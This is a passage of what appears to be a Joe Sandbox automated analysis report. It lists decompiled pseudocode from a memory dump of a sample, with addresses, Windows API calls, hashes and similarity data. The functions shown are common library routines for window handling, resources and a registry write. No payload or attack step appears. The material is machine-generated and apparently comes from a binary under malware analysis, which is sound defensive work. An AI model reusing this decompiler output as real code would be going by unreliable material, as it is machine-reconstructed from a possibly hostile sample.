					_t35 = E0042A726();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E0042AA1B(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E0042A590( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x44a720;
				E0042AA72(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}









                                                                              0x0040d2a3
                                                                              0x0040d2ad
                                                                              0x0040d2af
                                                                              0x0040d2b2
                                                                              0x0040d2bc
                                                                              0x0040d2bf
                                                                              0x0040d2c4
                                                                              0x0040d2c7
                                                                              0x0040d2e2
                                                                              0x0040d2e3
                                                                              0x0040d2ea
                                                                              0x0040d2ed
                                                                              0x00000000
                                                                              0x0040d2ef
                                                                              0x0040d2f2
                                                                              0x0040d315
                                                                              0x0040d2f4
                                                                              0x0040d2fe
                                                                              0x0040d2ff
                                                                              0x0040d300
                                                                              0x0040d301
                                                                              0x0040d302
                                                                              0x0040d304
                                                                              0x0040d329
                                                                              0x0040d337
                                                                              0x0040d33c
                                                                              0x0040d341
                                                                              0x0040d347
                                                                              0x0040d343
                                                                              0x0040d343
                                                                              0x0040d343
                                                                              0x0040d34d
                                                                              0x0040d34d
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d2c9
                                                                              0x0040d34f
                                                                              0x0040d356
                                                                              0x0040d35d
                                                                              0x0040d369
                                                                              0x0040d371

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CreateH_prologIndirectRect
                                                                              • String ID:
                                                                              • API String ID: 2123978231-0
                                                                              • Opcode ID: 0c3c60d19b509a656745e8f4ecf286f586bea255c8da5058b13135cfd8e721dd
                                                                              • Instruction ID: ea57ef96c73db157abcf51b2fe3bf7253e0036949588745d898d95e3a42e6923
                                                                              • Opcode Fuzzy Hash: 0c3c60d19b509a656745e8f4ecf286f586bea255c8da5058b13135cfd8e721dd
                                                                              • Instruction Fuzzy Hash: 9A213B71E00219DBCB01DFE4D98499EB7B8FF08744F1080AAED01AB291C7789E45CBB6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040E468, Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E0040E468(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E0040E3EB( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L0040DC95( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                              0x0040e46c
                                                                              0x0040e471
                                                                              0x0040e50c
                                                                              0x0040e50c
                                                                              0x0040e478
                                                                              0x0040e47e
                                                                              0x0040e492
                                                                              0x0040e492
                                                                              0x0040e495
                                                                              0x0040e4e6
                                                                              0x0040e4ec
                                                                              0x0040e4ec
                                                                              0x0040e4ef
                                                                              0x0040e4f2
                                                                              0x0040e503
                                                                              0x0040e503
                                                                              0x00000000
                                                                              0x0040e509
                                                                              0x0040e497
                                                                              0x0040e497
                                                                              0x0040e498
                                                                              0x0040e4d6
                                                                              0x0040e4d6
                                                                              0x0040e4d8
                                                                              0x0040e4da
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e4df
                                                                              0x00000000
                                                                              0x0040e4df
                                                                              0x0040e49a
                                                                              0x0040e49a
                                                                              0x0040e49d
                                                                              0x0040e4ce
                                                                              0x00000000
                                                                              0x0040e4ce
                                                                              0x0040e49f
                                                                              0x0040e49f
                                                                              0x0040e4a0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e4a2
                                                                              0x0040e4a2
                                                                              0x0040e4a5
                                                                              0x0040e4ad
                                                                              0x0040e4b2
                                                                              0x0040e4b5
                                                                              0x0040e4b7
                                                                              0x0040e4c0
                                                                              0x0040e4c0
                                                                              0x0040e4c6
                                                                              0x0040e4c6
                                                                              0x00000000
                                                                              0x0040e4a5
                                                                              0x0040e480
                                                                              0x0040e484
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040e487
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ArrayDestroyFreeSafeTask
                                                                              • String ID:
                                                                              • API String ID: 3253174383-0
                                                                              • Opcode ID: ce733f397ee8e04e4255276be981774e0241018d0a97f61bab80092f8f40a1bd
                                                                              • Instruction ID: 6712231b69e5409a9b39970e44f3f9bc4e9eaa71795f30219669f2762493ad86
                                                                              • Opcode Fuzzy Hash: ce733f397ee8e04e4255276be981774e0241018d0a97f61bab80092f8f40a1bd
                                                                              • Instruction Fuzzy Hash: 36118B30604206EBDB345F67DD88B67B7A8BF00351F144C3AF945AA3D0DB78D921DA58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D3E6, Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E0040D3E6(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E004128A0(E0043114F, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x44ada0;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E0042AA0D();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E0040C8B4( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x44a720;
				E0042AA72(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}








                                                                              0x0040d3eb
                                                                              0x0040d3f7
                                                                              0x0040d3fa
                                                                              0x0040d404
                                                                              0x0040d407
                                                                              0x0040d40a
                                                                              0x0040d41b
                                                                              0x0040d423
                                                                              0x0040d42c
                                                                              0x0040d441
                                                                              0x0040d44f
                                                                              0x0040d457
                                                                              0x0040d45a
                                                                              0x0040d470
                                                                              0x0040d471
                                                                              0x0040d476
                                                                              0x0040d45c
                                                                              0x0040d463
                                                                              0x0040d463
                                                                              0x0040d40c
                                                                              0x0040d416
                                                                              0x0040d416
                                                                              0x0040d479
                                                                              0x0040d480
                                                                              0x0040d487
                                                                              0x0040d493
                                                                              0x0040d49b

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$EqualH_prologIntersect
                                                                              • String ID:
                                                                              • API String ID: 2227276553-0
                                                                              • Opcode ID: 20c40cfe3995942c9c5648ee7661bbe6a095b269792c8fe24b7a9b661c83874c
                                                                              • Instruction ID: a7196cce4ed452137cb3dd0307f2a7c944c9da2468b9ab9a95a92e92d7620d15
                                                                              • Opcode Fuzzy Hash: 20c40cfe3995942c9c5648ee7661bbe6a095b269792c8fe24b7a9b661c83874c
                                                                              • Instruction Fuzzy Hash: 4A212C72900119EFDB11EFA4CA84D9EB7B8FF08355B10816AF915E3250D7349E15CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424904, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00424904(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E0042D179() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                              0x00424907
                                                                              0x0042490b
                                                                              0x00424914
                                                                              0x00424917
                                                                              0x0042491a
                                                                              0x00424921
                                                                              0x00424938
                                                                              0x00424938
                                                                              0x0042493f
                                                                              0x0042494a
                                                                              0x0042494a
                                                                              0x0042494e
                                                                              0x00424951
                                                                              0x00424959
                                                                              0x0042495b
                                                                              0x0042496a
                                                                              0x0042496e
                                                                              0x0042495d
                                                                              0x0042495d
                                                                              0x00424960
                                                                              0x00424964
                                                                              0x00424964
                                                                              0x00424977
                                                                              0x00424983
                                                                              0x00424983
                                                                              0x00424977
                                                                              0x00424989
                                                                              0x0042498e
                                                                              0x0042498e
                                                                              0x0042499a

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0042492A
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00424932
                                                                              • LockResource.KERNEL32(00000000), ref: 00424944
                                                                              • FreeResource.KERNEL32(00000000), ref: 0042498E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: 5d2418c4b772019cadd20ddff2a9147ef37ee7c026b283054c07160f3cb9ef8b
                                                                              • Instruction ID: 832c69868d111b4bd75ef755f22454367999f842838748fd623fbf563cb1e24d
                                                                              • Opcode Fuzzy Hash: 5d2418c4b772019cadd20ddff2a9147ef37ee7c026b283054c07160f3cb9ef8b
                                                                              • Instruction Fuzzy Hash: AA11BFBA601720EFC7209FB4E948AABF778FB44764F40446AE84253760D3B8AD84CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042780B, Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042780B(intOrPtr* __ecx) {
				struct HWND__* _t14;
				intOrPtr* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					 *((intOrPtr*)( *__ecx + 0x16c))();
				}
				SendMessageA( *(_t23 + 0x1c), 0x1f, 0, 0);
				E00426CA2( *(_t23 + 0x1c), 0x1f, 0, 0, 1, 1);
				SendMessageA( *(E004270C8(_t23) + 0x1c), 0x1f, 0, 0);
				E00426CA2( *((intOrPtr*)(_t11 + 0x1c)), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}





                                                                              0x0042780d
                                                                              0x0042781a
                                                                              0x00427820
                                                                              0x00427820
                                                                              0x00427835
                                                                              0x00427842
                                                                              0x00427857
                                                                              0x00427864
                                                                              0x00427869
                                                                              0x00427871
                                                                              0x00000000
                                                                              0x00427878
                                                                              0x0042787d

                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00427835
                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00427857
                                                                              • GetCapture.USER32 ref: 00427869
                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00427878
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Capture
                                                                              • String ID:
                                                                              • API String ID: 1665607226-0
                                                                              • Opcode ID: 92dc45a1b99d45456cba3eaa0dc970d47fecc4feb12eeb9eb5739b29e193452e
                                                                              • Instruction ID: bc1538bc5d21434a992b24d336590cad051ba99304ed70cb5b705d525eda5016
                                                                              • Opcode Fuzzy Hash: 92dc45a1b99d45456cba3eaa0dc970d47fecc4feb12eeb9eb5739b29e193452e
                                                                              • Instruction Fuzzy Hash: 2E0162703402197FFA302F25ACC9FBB76ADEF48745F150439F7419A1D2C6A54C059564
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428FF0, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E00428FF0(void* __ecx, void* __esi) {
				void* _v8;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				if(E00424440(0x10) == 0) {
					_t30 = 0;
				} else {
					_t30 = E00428F8A(_t9, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E00429E88(GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}








                                                                              0x00428ff0
                                                                              0x00428ff3
                                                                              0x00428ff8
                                                                              0x00429002
                                                                              0x00429011
                                                                              0x00429004
                                                                              0x0042900d
                                                                              0x0042900d
                                                                              0x00429013
                                                                              0x00429024
                                                                              0x00429036
                                                                              0x0042903a
                                                                              0x00429042
                                                                              0x00429042
                                                                              0x0042904f
                                                                              0x0042904f
                                                                              0x00429057
                                                                              0x0042905d
                                                                              0x00429065

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00429024
                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 0042902A
                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 0042902D
                                                                              • GetLastError.KERNEL32(?), ref: 00429048
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 3907606552-0
                                                                              • Opcode ID: 4a8054f8e2d074c8a2766e6fad608505b143d69d6cdbe99f4948b685cf361d5c
                                                                              • Instruction ID: ab98123d3fa7c14d89c24ecc318cb74a2e0d639b37ea85ac515eb7df8dc2f3ec
                                                                              • Opcode Fuzzy Hash: 4a8054f8e2d074c8a2766e6fad608505b143d69d6cdbe99f4948b685cf361d5c
                                                                              • Instruction Fuzzy Hash: 2001D431700224BBDB109BA6ED49F5B7BA9EF84320F544026BA18CB281DBB4DC008BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00426CA2, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E00426CA2(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E0042642D();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E004269CB();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E00426CA2(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                              0x00426cb0
                                                                              0x00426d13
                                                                              0x00426d13
                                                                              0x00426d17
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426cb8
                                                                              0x00426ce2
                                                                              0x00426cba
                                                                              0x00426cba
                                                                              0x00426cbb
                                                                              0x00426cc2
                                                                              0x00426cc4
                                                                              0x00426cc7
                                                                              0x00426cca
                                                                              0x00426ccd
                                                                              0x00426cd0
                                                                              0x00426cd1
                                                                              0x00426cd1
                                                                              0x00426cc2
                                                                              0x00426cec
                                                                              0x00426d05
                                                                              0x00426d05
                                                                              0x00426d0d
                                                                              0x00426d0d
                                                                              0x00426d1c

                                                                              APIs
                                                                              • GetTopWindow.USER32(?), ref: 00426CB0
                                                                              • GetTopWindow.USER32(00000000), ref: 00426CEF
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00426D0D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID:
                                                                              • API String ID: 2353593579-0
                                                                              • Opcode ID: dfdd47206f5f1ef2de75baa53a9eb16683f4db0ea9a957aaa36fce34aefa5f2a
                                                                              • Instruction ID: a58eb876f5fa42b864356ea00a36a42f8a7a189bbd2e22587ab6ee7afe7d0634
                                                                              • Opcode Fuzzy Hash: dfdd47206f5f1ef2de75baa53a9eb16683f4db0ea9a957aaa36fce34aefa5f2a
                                                                              • Instruction Fuzzy Hash: 0A014C3220112ABBCF126F92ED04EDF3B29FF14351F468012FE0051160C73AC922EBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004266F6, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E004266F6(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = GetDlgItem(_a4, _a8);
				if(_t14 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t15 = _t10;
						if(_t15 == 0) {
							goto L10;
						}
						_t10 = E004266F6(_t15, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t15, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t14) == 0) {
						L3:
						_push(_t14);
						if(_a12 == 0) {
							return E00426406(_t16);
						}
						_t10 = E0042642D();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E004266F6(_t14, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}








                                                                              0x0042670d
                                                                              0x00426711
                                                                              0x00426741
                                                                              0x00426744
                                                                              0x00426761
                                                                              0x00426761
                                                                              0x00426765
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042674f
                                                                              0x00426756
                                                                              0x0042675b
                                                                              0x00000000
                                                                              0x0042675b
                                                                              0x00000000
                                                                              0x00426756
                                                                              0x00426713
                                                                              0x00426718
                                                                              0x0042672a
                                                                              0x0042672e
                                                                              0x0042672f
                                                                              0x00000000
                                                                              0x00426731
                                                                              0x00426738
                                                                              0x0042673f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042671a
                                                                              0x00426721
                                                                              0x00426728
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426728
                                                                              0x00426718
                                                                              0x0042676a
                                                                              0x0042676a

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00426701
                                                                              • GetTopWindow.USER32(00000000), ref: 00426714
                                                                                • Part of subcall function 004266F6: GetWindow.USER32(00000000,00000002), ref: 0042675B
                                                                              • GetTopWindow.USER32(?), ref: 00426744
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item
                                                                              • String ID:
                                                                              • API String ID: 369458955-0
                                                                              • Opcode ID: 5631705e5c809f957598b4c13ecee59b467cdb1cffa8234aa5444bbb269fcfa3
                                                                              • Instruction ID: dc0d08a4c2c18415d0f8e2ec45dbf80cadd953b3f38c647402dafb4351fdb606
                                                                              • Opcode Fuzzy Hash: 5631705e5c809f957598b4c13ecee59b467cdb1cffa8234aa5444bbb269fcfa3
                                                                              • Instruction Fuzzy Hash: 7501D632300639B7DF223F61BE04EAF3A59AF94398F924027FC0191210DB79C91296AD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B95D, Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042B95D(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x457184; // 0xb7aa1229
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x449c40, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E0042DB1E(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E00412FBB(_t19, _v8);
			}









                                                                              0x0042b963
                                                                              0x0042b969
                                                                              0x0042b96f
                                                                              0x0042b972
                                                                              0x0042b9b6
                                                                              0x0042b9cc
                                                                              0x0042b974
                                                                              0x0042b97c
                                                                              0x0042b980
                                                                              0x0042b991
                                                                              0x0042b99a
                                                                              0x0042b9a4
                                                                              0x0042b9a7
                                                                              0x0042b980
                                                                              0x0042b9dc

                                                                              APIs
